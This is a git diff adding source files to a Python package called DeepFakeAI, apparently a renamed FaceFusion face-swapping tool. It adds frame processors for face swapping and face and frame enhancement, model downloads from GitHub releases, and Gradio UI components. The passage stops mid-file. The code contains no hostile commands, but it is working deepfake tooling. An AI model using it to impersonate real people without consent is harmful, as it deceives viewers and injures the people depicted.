0000000000000000000000000000000000000000..a868cc7770ad4847ecf68c82bdc0f4d4b6c961b2 Binary files /dev/null and b/DeepFakeAI/processors/frame/__pycache__/core.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/core.py b/DeepFakeAI/processors/frame/core.py new file mode 100644 index 0000000000000000000000000000000000000000..8a44cb2413b53b88dec2d65667ef0e8b2fe11e72 --- /dev/null +++ b/DeepFakeAI/processors/frame/core.py @@ -0,0 +1,113 @@ +import os +import sys +import importlib +import psutil +from concurrent.futures import ThreadPoolExecutor, as_completed +from queue import Queue +from types import ModuleType +from typing import Any, List, Callable +from tqdm import tqdm + +import DeepFakeAI.globals +from DeepFakeAI import wording + +FRAME_PROCESSORS_MODULES : List[ModuleType] = [] +FRAME_PROCESSORS_METHODS =\ +[ + 'get_frame_processor', + 'clear_frame_processor', + 'pre_check', + 'pre_process', + 'process_frame', + 'process_frames', + 'process_image', + 'process_video', + 'post_process' +] + + +def load_frame_processor_module(frame_processor : str) -> Any: + try: + frame_processor_module = importlib.import_module('DeepFakeAI.processors.frame.modules.' 
+ frame_processor) + for method_name in FRAME_PROCESSORS_METHODS: + if not hasattr(frame_processor_module, method_name): + raise NotImplementedError + except ModuleNotFoundError: + sys.exit(wording.get('frame_processor_not_loaded').format(frame_processor = frame_processor)) + except NotImplementedError: + sys.exit(wording.get('frame_processor_not_implemented').format(frame_processor = frame_processor)) + return frame_processor_module + + +def get_frame_processors_modules(frame_processors : List[str]) -> List[ModuleType]: + global FRAME_PROCESSORS_MODULES + + if not FRAME_PROCESSORS_MODULES: + for frame_processor in frame_processors: + frame_processor_module = load_frame_processor_module(frame_processor) + FRAME_PROCESSORS_MODULES.append(frame_processor_module) + return FRAME_PROCESSORS_MODULES + + +def clear_frame_processors_modules() -> None: + global FRAME_PROCESSORS_MODULES + + for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): + frame_processor_module.clear_frame_processor() + FRAME_PROCESSORS_MODULES = [] + + +def multi_process_frame(source_path : str, temp_frame_paths : List[str], process_frames: Callable[[str, List[str], Any], None], update: Callable[[], None]) -> None: + with ThreadPoolExecutor(max_workers = DeepFakeAI.globals.execution_thread_count) as executor: + futures = [] + queue = create_queue(temp_frame_paths) + queue_per_future = max(len(temp_frame_paths) // DeepFakeAI.globals.execution_thread_count * DeepFakeAI.globals.execution_queue_count, 1) + while not queue.empty(): + future = executor.submit(process_frames, source_path, pick_queue(queue, queue_per_future), update) + futures.append(future) + for future in as_completed(futures): + future.result() + + +def create_queue(temp_frame_paths : List[str]) -> Queue[str]: + queue: Queue[str] = Queue() + for frame_path in temp_frame_paths: + queue.put(frame_path) + return queue + + +def pick_queue(queue : Queue[str], queue_per_future : int) -> List[str]: + queues = [] + for _ in range(queue_per_future): + if not queue.empty(): + queues.append(queue.get()) + return queues + + +def process_video(source_path : str, frame_paths : List[str], process_frames : Callable[[str, List[str], Any], None]) -> None: + progress_bar_format = '{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}, {rate_fmt}{postfix}]' + total = len(frame_paths) + with tqdm(total = total, desc = wording.get('processing'), unit = 'frame', dynamic_ncols = True, bar_format = progress_bar_format) as progress: + multi_process_frame(source_path, frame_paths, process_frames, lambda: update_progress(progress)) + + +def update_progress(progress : Any = None) -> None: + process = psutil.Process(os.getpid()) + memory_usage = process.memory_info().rss / 1024 / 1024 / 1024 + progress.set_postfix( + { + 'memory_usage': '{:.2f}'.format(memory_usage).zfill(5) + 'GB', + 'execution_providers': DeepFakeAI.globals.execution_providers, + 'execution_thread_count': DeepFakeAI.globals.execution_thread_count, + 'execution_queue_count': DeepFakeAI.globals.execution_queue_count + }) + progress.refresh() + progress.update(1) + + +def get_device() -> str: + if 'CUDAExecutionProvider' in DeepFakeAI.globals.execution_providers: + return 'cuda' + if 'CoreMLExecutionProvider' in DeepFakeAI.globals.execution_providers: + return 'mps' + return 'cpu' diff --git a/DeepFakeAI/processors/frame/modules/__init__.py b/DeepFakeAI/processors/frame/modules/__init__.py new file mode 100644 index 
0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/__init__.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..5169ea224301b6d35797d6df88e7dca5e562d658 Binary files /dev/null and b/DeepFakeAI/processors/frame/modules/__pycache__/__init__.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/face_enhancer.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/face_enhancer.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..75acffebdfcae9b8cc81f13b0f0eb2b4e04c8713 Binary files /dev/null and b/DeepFakeAI/processors/frame/modules/__pycache__/face_enhancer.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/face_swapper.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/face_swapper.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..ecb76b83735c49d9b3360b53d59a09bbc67dabd5 Binary files /dev/null and b/DeepFakeAI/processors/frame/modules/__pycache__/face_swapper.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/modules/__pycache__/frame_enhancer.cpython-310.pyc b/DeepFakeAI/processors/frame/modules/__pycache__/frame_enhancer.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..1a4289669ae04f4ecaeb6ec0bdba0be429f92785 Binary files /dev/null and b/DeepFakeAI/processors/frame/modules/__pycache__/frame_enhancer.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/modules/face_enhancer.py b/DeepFakeAI/processors/frame/modules/face_enhancer.py new file mode 100644 index 0000000000000000000000000000000000000000..65cfc5f5ef67352315ee8b2215f6cd00f8f6d241 --- /dev/null +++ b/DeepFakeAI/processors/frame/modules/face_enhancer.py @@ -0,0 +1,100 @@ +from typing import Any, List, Callable +import cv2 +import threading +from gfpgan.utils import GFPGANer + +import DeepFakeAI.globals +import DeepFakeAI.processors.frame.core as frame_processors +from DeepFakeAI import wording +from DeepFakeAI.core import update_status +from DeepFakeAI.face_analyser import get_many_faces +from DeepFakeAI.typing import Frame, Face +from DeepFakeAI.utilities import conditional_download, resolve_relative_path, is_image, is_video + +FRAME_PROCESSOR = None +THREAD_SEMAPHORE = threading.Semaphore() +THREAD_LOCK = threading.Lock() +NAME = 'FACEFUSION.FRAME_PROCESSOR.FACE_ENHANCER' + + +def get_frame_processor() -> Any: + global FRAME_PROCESSOR + + with THREAD_LOCK: + if FRAME_PROCESSOR is None: + model_path = resolve_relative_path('../.assets/models/GFPGANv1.4.pth') + FRAME_PROCESSOR = GFPGANer( + model_path = model_path, + upscale = 1, + device = frame_processors.get_device() + ) + return FRAME_PROCESSOR + + +def clear_frame_processor() -> None: + global FRAME_PROCESSOR + + FRAME_PROCESSOR = None + + +def pre_check() -> bool: + download_directory_path = resolve_relative_path('../.assets/models') + conditional_download(download_directory_path, ['https://github.com/facefusion/facefusion-assets/releases/download/models/GFPGANv1.4.pth']) + return True + + +def pre_process() -> bool: + if not is_image(DeepFakeAI.globals.target_path) and not is_video(DeepFakeAI.globals.target_path): + update_status(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) + return False + return True + + +def post_process() -> 
None: + clear_frame_processor() + + +def enhance_face(target_face : Face, temp_frame : Frame) -> Frame: + start_x, start_y, end_x, end_y = map(int, target_face['bbox']) + padding_x = int((end_x - start_x) * 0.5) + padding_y = int((end_y - start_y) * 0.5) + start_x = max(0, start_x - padding_x) + start_y = max(0, start_y - padding_y) + end_x = max(0, end_x + padding_x) + end_y = max(0, end_y + padding_y) + crop_frame = temp_frame[start_y:end_y, start_x:end_x] + if crop_frame.size: + with THREAD_SEMAPHORE: + _, _, crop_frame = get_frame_processor().enhance( + crop_frame, + paste_back = True + ) + temp_frame[start_y:end_y, start_x:end_x] = crop_frame + return temp_frame + + +def process_frame(source_face : Face, reference_face : Face, temp_frame : Frame) -> Frame: + many_faces = get_many_faces(temp_frame) + if many_faces: + for target_face in many_faces: + temp_frame = enhance_face(target_face, temp_frame) + return temp_frame + + +def process_frames(source_path : str, temp_frame_paths : List[str], update: Callable[[], None]) -> None: + for temp_frame_path in temp_frame_paths: + temp_frame = cv2.imread(temp_frame_path) + result_frame = process_frame(None, None, temp_frame) + cv2.imwrite(temp_frame_path, result_frame) + if update: + update() + + +def process_image(source_path : str, target_path : str, output_path : str) -> None: + target_frame = cv2.imread(target_path) + result_frame = process_frame(None, None, target_frame) + cv2.imwrite(output_path, result_frame) + + +def process_video(source_path : str, temp_frame_paths : List[str]) -> None: + DeepFakeAI.processors.frame.core.process_video(None, temp_frame_paths, process_frames) diff --git a/DeepFakeAI/processors/frame/modules/face_swapper.py b/DeepFakeAI/processors/frame/modules/face_swapper.py new file mode 100644 index 0000000000000000000000000000000000000000..3479b577eb5bf6a9f04ce48e32350fc1490eba12 --- /dev/null +++ b/DeepFakeAI/processors/frame/modules/face_swapper.py @@ -0,0 +1,105 @@ +from typing import Any, List, Callable +import cv2 +import insightface +import threading + +import DeepFakeAI.globals +import DeepFakeAI.processors.frame.core as frame_processors +from DeepFakeAI import wording +from DeepFakeAI.core import update_status +from DeepFakeAI.face_analyser import get_one_face, get_many_faces, find_similar_faces +from DeepFakeAI.face_reference import get_face_reference, set_face_reference +from DeepFakeAI.typing import Face, Frame +from DeepFakeAI.utilities import conditional_download, resolve_relative_path, is_image, is_video + +FRAME_PROCESSOR = None +THREAD_LOCK = threading.Lock() +NAME = 'FACEFUSION.FRAME_PROCESSOR.FACE_SWAPPER' + + +def get_frame_processor() -> Any: + global FRAME_PROCESSOR + + with THREAD_LOCK: + if FRAME_PROCESSOR is None: + model_path = resolve_relative_path('../.assets/models/inswapper_128.onnx') + FRAME_PROCESSOR = insightface.model_zoo.get_model(model_path, providers = DeepFakeAI.globals.execution_providers) + return FRAME_PROCESSOR + + +def clear_frame_processor() -> None: + global FRAME_PROCESSOR + + FRAME_PROCESSOR = None + + +def pre_check() -> bool: + download_directory_path = resolve_relative_path('../.assets/models') + conditional_download(download_directory_path, ['https://github.com/facefusion/facefusion-assets/releases/download/models/inswapper_128.onnx']) + return True + + +def pre_process() -> bool: + if not is_image(DeepFakeAI.globals.source_path): + update_status(wording.get('select_image_source') + wording.get('exclamation_mark'), NAME) + return False + elif not 
get_one_face(cv2.imread(DeepFakeAI.globals.source_path)): + update_status(wording.get('no_source_face_detected') + wording.get('exclamation_mark'), NAME) + return False + if not is_image(DeepFakeAI.globals.target_path) and not is_video(DeepFakeAI.globals.target_path): + update_status(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) + return False + return True + + +def post_process() -> None: + clear_frame_processor() + + +def swap_face(source_face : Face, target_face : Face, temp_frame : Frame) -> Frame: + return get_frame_processor().get(temp_frame, target_face, source_face, paste_back = True) + + +def process_frame(source_face : Face, reference_face : Face, temp_frame : Frame) -> Frame: + if 'reference' in DeepFakeAI.globals.face_recognition: + similar_faces = find_similar_faces(temp_frame, reference_face, DeepFakeAI.globals.reference_face_distance) + if similar_faces: + for similar_face in similar_faces: + temp_frame = swap_face(source_face, similar_face, temp_frame) + if 'many' in DeepFakeAI.globals.face_recognition: + many_faces = get_many_faces(temp_frame) + if many_faces: + for target_face in many_faces: + temp_frame = swap_face(source_face, target_face, temp_frame) + return temp_frame + + +def process_frames(source_path : str, temp_frame_paths : List[str], update: Callable[[], None]) -> None: + source_face = get_one_face(cv2.imread(source_path)) + reference_face = get_face_reference() if 'reference' in DeepFakeAI.globals.face_recognition else None + for temp_frame_path in temp_frame_paths: + temp_frame = cv2.imread(temp_frame_path) + result_frame = process_frame(source_face, reference_face, temp_frame) + cv2.imwrite(temp_frame_path, result_frame) + if update: + update() + + +def process_image(source_path : str, target_path : str, output_path : str) -> None: + source_face = get_one_face(cv2.imread(source_path)) + target_frame = cv2.imread(target_path) + reference_face = get_one_face(target_frame, DeepFakeAI.globals.reference_face_position) if 'reference' in DeepFakeAI.globals.face_recognition else None + result_frame = process_frame(source_face, reference_face, target_frame) + cv2.imwrite(output_path, result_frame) + + +def process_video(source_path : str, temp_frame_paths : List[str]) -> None: + conditional_set_face_reference(temp_frame_paths) + frame_processors.process_video(source_path, temp_frame_paths, process_frames) + + +def conditional_set_face_reference(temp_frame_paths : List[str]) -> None: + if 'reference' in DeepFakeAI.globals.face_recognition and not get_face_reference(): + reference_frame = cv2.imread(temp_frame_paths[DeepFakeAI.globals.reference_frame_number]) + reference_face = get_one_face(reference_frame, DeepFakeAI.globals.reference_face_position) + set_face_reference(reference_face) diff --git a/DeepFakeAI/processors/frame/modules/frame_enhancer.py b/DeepFakeAI/processors/frame/modules/frame_enhancer.py new file mode 100644 index 0000000000000000000000000000000000000000..9c5b9e0f783b2805e234b409e658ad4d57cadaed --- /dev/null +++ b/DeepFakeAI/processors/frame/modules/frame_enhancer.py @@ -0,0 +1,88 @@ +from typing import Any, List, Callable +import cv2 +import threading +from basicsr.archs.rrdbnet_arch import RRDBNet +from realesrgan import RealESRGANer + +import DeepFakeAI.processors.frame.core as frame_processors +from DeepFakeAI.typing import Frame, Face +from DeepFakeAI.utilities import conditional_download, resolve_relative_path + +FRAME_PROCESSOR = None +THREAD_SEMAPHORE = threading.Semaphore() +THREAD_LOCK = 
threading.Lock() +NAME = 'FACEFUSION.FRAME_PROCESSOR.FRAME_ENHANCER' + + +def get_frame_processor() -> Any: + global FRAME_PROCESSOR + + with THREAD_LOCK: + if FRAME_PROCESSOR is None: + model_path = resolve_relative_path('../.assets/models/RealESRGAN_x4plus.pth') + FRAME_PROCESSOR = RealESRGANer( + model_path = model_path, + model = RRDBNet( + num_in_ch = 3, + num_out_ch = 3, + num_feat = 64, + num_block = 23, + num_grow_ch = 32, + scale = 4 + ), + device = frame_processors.get_device(), + tile = 512, + tile_pad = 32, + pre_pad = 0, + scale = 4 + ) + return FRAME_PROCESSOR + + +def clear_frame_processor() -> None: + global FRAME_PROCESSOR + + FRAME_PROCESSOR = None + + +def pre_check() -> bool: + download_directory_path = resolve_relative_path('../.assets/models') + conditional_download(download_directory_path, ['https://github.com/facefusion/facefusion-assets/releases/download/models/RealESRGAN_x4plus.pth']) + return True + + +def pre_process() -> bool: + return True + + +def post_process() -> None: + clear_frame_processor() + + +def enhance_frame(temp_frame : Frame) -> Frame: + with THREAD_SEMAPHORE: + temp_frame, _ = get_frame_processor().enhance(temp_frame, outscale = 1) + return temp_frame + + +def process_frame(source_face : Face, reference_face : Face, temp_frame : Frame) -> Frame: + return enhance_frame(temp_frame) + + +def process_frames(source_path : str, temp_frame_paths : List[str], update: Callable[[], None]) -> None: + for temp_frame_path in temp_frame_paths: + temp_frame = cv2.imread(temp_frame_path) + result_frame = process_frame(None, None, temp_frame) + cv2.imwrite(temp_frame_path, result_frame) + if update: + update() + + +def process_image(source_path : str, target_path : str, output_path : str) -> None: + target_frame = cv2.imread(target_path) + result = process_frame(None, None, target_frame) + cv2.imwrite(output_path, result) + + +def process_video(source_path : str, temp_frame_paths : List[str]) -> None: + frame_processors.process_video(None, temp_frame_paths, process_frames) diff --git a/DeepFakeAI/typing.py b/DeepFakeAI/typing.py new file mode 100644 index 0000000000000000000000000000000000000000..74f2b8746172ce2d58705f073a45c2276766ce60 --- /dev/null +++ b/DeepFakeAI/typing.py @@ -0,0 +1,13 @@ +from typing import Any, Literal +from insightface.app.common import Face +import numpy + +Face = Face +Frame = numpy.ndarray[Any, Any] + +FaceRecognition = Literal[ 'reference', 'many' ] +FaceAnalyserDirection = Literal[ 'left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small' ] +FaceAnalyserAge = Literal[ 'child', 'teen', 'adult', 'senior' ] +FaceAnalyserGender = Literal[ 'male', 'female' ] +TempFrameFormat = Literal[ 'jpg', 'png' ] +OutputVideoEncoder = Literal[ 'libx264', 'libx265', 'libvpx-vp9', 'h264_nvenc', 'hevc_nvenc' ] diff --git a/DeepFakeAI/uis/__init__.py b/DeepFakeAI/uis/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/uis/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/uis/__pycache__/__init__.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..7e65d5e72179cfb8a3e34bc8c837be7baf1f70ff Binary files /dev/null and b/DeepFakeAI/uis/__pycache__/__init__.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/__pycache__/core.cpython-310.pyc b/DeepFakeAI/uis/__pycache__/core.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..164b847092fe203effcf90fc8bc202f5ac979864 Binary files 
/dev/null and b/DeepFakeAI/uis/__pycache__/core.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/__pycache__/typing.cpython-310.pyc b/DeepFakeAI/uis/__pycache__/typing.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..711667d642e4fc9041427d068f185457b2080f28 Binary files /dev/null and b/DeepFakeAI/uis/__pycache__/typing.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__init__.py b/DeepFakeAI/uis/components/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/uis/components/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/__init__.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..93d3f0014e15d391031011244703f4a6a66fd6a1 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/__init__.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/about.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/about.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..d0f42183e18c96b373637e15fd1d5f4d2f256d8a Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/about.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/execution.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/execution.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..b7891263d232d951c701fdc93d0c96a10938d04a Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/execution.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/face_analyser.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/face_analyser.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..282b65a6bce2c05a9cc85475072ec753a17d8036 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/face_analyser.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/face_selector.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/face_selector.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..968fd092417ddb2f5b4ee5c65c047ac91d0a8431 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/face_selector.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/output.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/output.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..26fd18c65983ebe5d2c2770fd53714e4f48af985 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/output.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/output_settings.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/output_settings.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..77d25365cbede84a457d8bad814bfaa7b0aca6cb Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/output_settings.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/preview.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/preview.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..653e151a536bd335cc967238441707f766e46efb Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/preview.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/processors.cpython-310.pyc 
b/DeepFakeAI/uis/components/__pycache__/processors.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..8308ca2a8b3d462af61833ccc5d6a78245788947 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/processors.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/settings.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/settings.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..444b99edbae493ec108dc6385fc904be6d848624 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/settings.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/source.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/source.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..8cccb58080631ed048f56b813d3d271a76e7c372 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/source.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/target.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/target.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..206d0873d82ad8965b675c0f1d95a202b7e60308 Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/target.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/temp_frame.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/temp_frame.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..b1aa889546149e6cc88f235944b73d6e1f6d1a5f Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/temp_frame.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/__pycache__/trim_frame.cpython-310.pyc b/DeepFakeAI/uis/components/__pycache__/trim_frame.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..28bee96cb9cdbfac53435706cefa670cb0aa31ba Binary files /dev/null and b/DeepFakeAI/uis/components/__pycache__/trim_frame.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/components/about.py b/DeepFakeAI/uis/components/about.py new file mode 100644 index 0000000000000000000000000000000000000000..8e7beed10c76eb9d3d6900563aa2be23897beb28 --- /dev/null +++ b/DeepFakeAI/uis/components/about.py @@ -0,0 +1,13 @@ +from typing import Optional +import gradio + +from DeepFakeAI import metadata + +ABOUT_HTML : Optional[gradio.HTML] = None + + +def render() -> None: + global ABOUT_HTML + + with gradio.Box(): + ABOUT_HTML = gradio.HTML('
<center>' + metadata.get('name') + ' ' + metadata.get('version') + '</center>
') diff --git a/DeepFakeAI/uis/components/benchmark.py b/DeepFakeAI/uis/components/benchmark.py new file mode 100644 index 0000000000000000000000000000000000000000..450cdd0dc82cf74fa203698b66b8860d913917a8 --- /dev/null +++ b/DeepFakeAI/uis/components/benchmark.py @@ -0,0 +1,116 @@ +from typing import Any, Optional, List +import time +import tempfile +import statistics +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.capturer import get_video_frame_total +from DeepFakeAI.core import conditional_process +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import normalize_output_path, clear_temp + +BENCHMARK_RESULT_DATAFRAME : Optional[gradio.Dataframe] = None +BENCHMARK_CYCLES_SLIDER : Optional[gradio.Button] = None +BENCHMARK_START_BUTTON : Optional[gradio.Button] = None +BENCHMARK_CLEAR_BUTTON : Optional[gradio.Button] = None + + +def render() -> None: + global BENCHMARK_RESULT_DATAFRAME + global BENCHMARK_CYCLES_SLIDER + global BENCHMARK_START_BUTTON + global BENCHMARK_CLEAR_BUTTON + + with gradio.Box(): + BENCHMARK_RESULT_DATAFRAME = gradio.Dataframe( + label = wording.get('benchmark_result_dataframe_label'), + headers = + [ + 'target_path', + 'benchmark_cycles', + 'average_run', + 'fastest_run', + 'slowest_run', + 'relative_fps' + ], + col_count = (6, 'fixed'), + row_count = (7, 'fixed'), + datatype = + [ + 'str', + 'number', + 'number', + 'number', + 'number', + 'number' + ] + ) + BENCHMARK_CYCLES_SLIDER = gradio.Slider( + label = wording.get('benchmark_cycles_slider_label'), + minimum = 1, + step = 1, + value = 3, + maximum = 10 + ) + with gradio.Row(): + BENCHMARK_START_BUTTON = gradio.Button(wording.get('start_button_label')) + BENCHMARK_CLEAR_BUTTON = gradio.Button(wording.get('clear_button_label')) + + +def listen() -> None: + BENCHMARK_START_BUTTON.click(update, inputs = BENCHMARK_CYCLES_SLIDER, outputs = BENCHMARK_RESULT_DATAFRAME) + BENCHMARK_CLEAR_BUTTON.click(clear, outputs = BENCHMARK_RESULT_DATAFRAME) + + +def update(benchmark_cycles : int) -> Update: + DeepFakeAI.globals.source_path = '.assets/examples/source.jpg' + target_paths =\ + [ + '.assets/examples/target-240p.mp4', + '.assets/examples/target-360p.mp4', + '.assets/examples/target-540p.mp4', + '.assets/examples/target-720p.mp4', + '.assets/examples/target-1080p.mp4', + '.assets/examples/target-1440p.mp4', + '.assets/examples/target-2160p.mp4' + ] + value = [ benchmark(target_path, benchmark_cycles) for target_path in target_paths ] + return gradio.update(value = value) + + +def benchmark(target_path : str, benchmark_cycles : int) -> List[Any]: + process_times = [] + total_fps = 0.0 + for i in range(benchmark_cycles + 1): + DeepFakeAI.globals.target_path = target_path + DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, tempfile.gettempdir()) + video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) + start_time = time.perf_counter() + conditional_process() + end_time = time.perf_counter() + process_time = end_time - start_time + fps = video_frame_total / process_time + if i > 0: + process_times.append(process_time) + total_fps += fps + average_run = round(statistics.mean(process_times), 2) + fastest_run = round(min(process_times), 2) + slowest_run = round(max(process_times), 2) + relative_fps = round(total_fps / benchmark_cycles, 2) + return\ + [ + DeepFakeAI.globals.target_path, + benchmark_cycles, + average_run, + fastest_run, + slowest_run, + relative_fps + ] + + +def 
clear() -> Update: + if DeepFakeAI.globals.target_path: + clear_temp(DeepFakeAI.globals.target_path) + return gradio.update(value = None) diff --git a/DeepFakeAI/uis/components/execution.py b/DeepFakeAI/uis/components/execution.py new file mode 100644 index 0000000000000000000000000000000000000000..23de9f5d50b365eeeee50db56af8cc78e6eccf73 --- /dev/null +++ b/DeepFakeAI/uis/components/execution.py @@ -0,0 +1,64 @@ +from typing import List, Optional +import gradio +import onnxruntime + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.face_analyser import clear_face_analyser +from DeepFakeAI.processors.frame.core import clear_frame_processors_modules +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import encode_execution_providers, decode_execution_providers + +EXECUTION_PROVIDERS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None +EXECUTION_THREAD_COUNT_SLIDER : Optional[gradio.Slider] = None +EXECUTION_QUEUE_COUNT_SLIDER : Optional[gradio.Slider] = None + + +def render() -> None: + global EXECUTION_PROVIDERS_CHECKBOX_GROUP + global EXECUTION_THREAD_COUNT_SLIDER + global EXECUTION_QUEUE_COUNT_SLIDER + + with gradio.Box(): + EXECUTION_PROVIDERS_CHECKBOX_GROUP = gradio.CheckboxGroup( + label = wording.get('execution_providers_checkbox_group_label'), + choices = encode_execution_providers(onnxruntime.get_available_providers()), + value = encode_execution_providers(DeepFakeAI.globals.execution_providers) + ) + EXECUTION_THREAD_COUNT_SLIDER = gradio.Slider( + label = wording.get('execution_thread_count_slider_label'), + value = DeepFakeAI.globals.execution_thread_count, + step = 1, + minimum = 1, + maximum = 128 + ) + EXECUTION_QUEUE_COUNT_SLIDER = gradio.Slider( + label = wording.get('execution_queue_count_slider_label'), + value = DeepFakeAI.globals.execution_queue_count, + step = 1, + minimum = 1, + maximum = 16 + ) + + +def listen() -> None: + EXECUTION_PROVIDERS_CHECKBOX_GROUP.change(update_execution_providers, inputs = EXECUTION_PROVIDERS_CHECKBOX_GROUP, outputs = EXECUTION_PROVIDERS_CHECKBOX_GROUP) + EXECUTION_THREAD_COUNT_SLIDER.change(update_execution_thread_count, inputs = EXECUTION_THREAD_COUNT_SLIDER, outputs = EXECUTION_THREAD_COUNT_SLIDER) + EXECUTION_QUEUE_COUNT_SLIDER.change(update_execution_queue_count, inputs = EXECUTION_QUEUE_COUNT_SLIDER, outputs = EXECUTION_QUEUE_COUNT_SLIDER) + + +def update_execution_providers(execution_providers : List[str]) -> Update: + clear_face_analyser() + clear_frame_processors_modules() + DeepFakeAI.globals.execution_providers = decode_execution_providers(execution_providers) + return gradio.update(value = execution_providers) + + +def update_execution_thread_count(execution_thread_count : int = 1) -> Update: + DeepFakeAI.globals.execution_thread_count = execution_thread_count + return gradio.update(value = execution_thread_count) + + +def update_execution_queue_count(execution_queue_count : int = 1) -> Update: + DeepFakeAI.globals.execution_queue_count = execution_queue_count + return gradio.update(value = execution_queue_count) diff --git a/DeepFakeAI/uis/components/face_analyser.py b/DeepFakeAI/uis/components/face_analyser.py new file mode 100644 index 0000000000000000000000000000000000000000..117cd3ee22c36344954ccd18c18f4fabbeeee96d --- /dev/null +++ b/DeepFakeAI/uis/components/face_analyser.py @@ -0,0 +1,54 @@ +from typing import Optional + +import gradio + +import DeepFakeAI.choices +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.uis import core as ui +from 
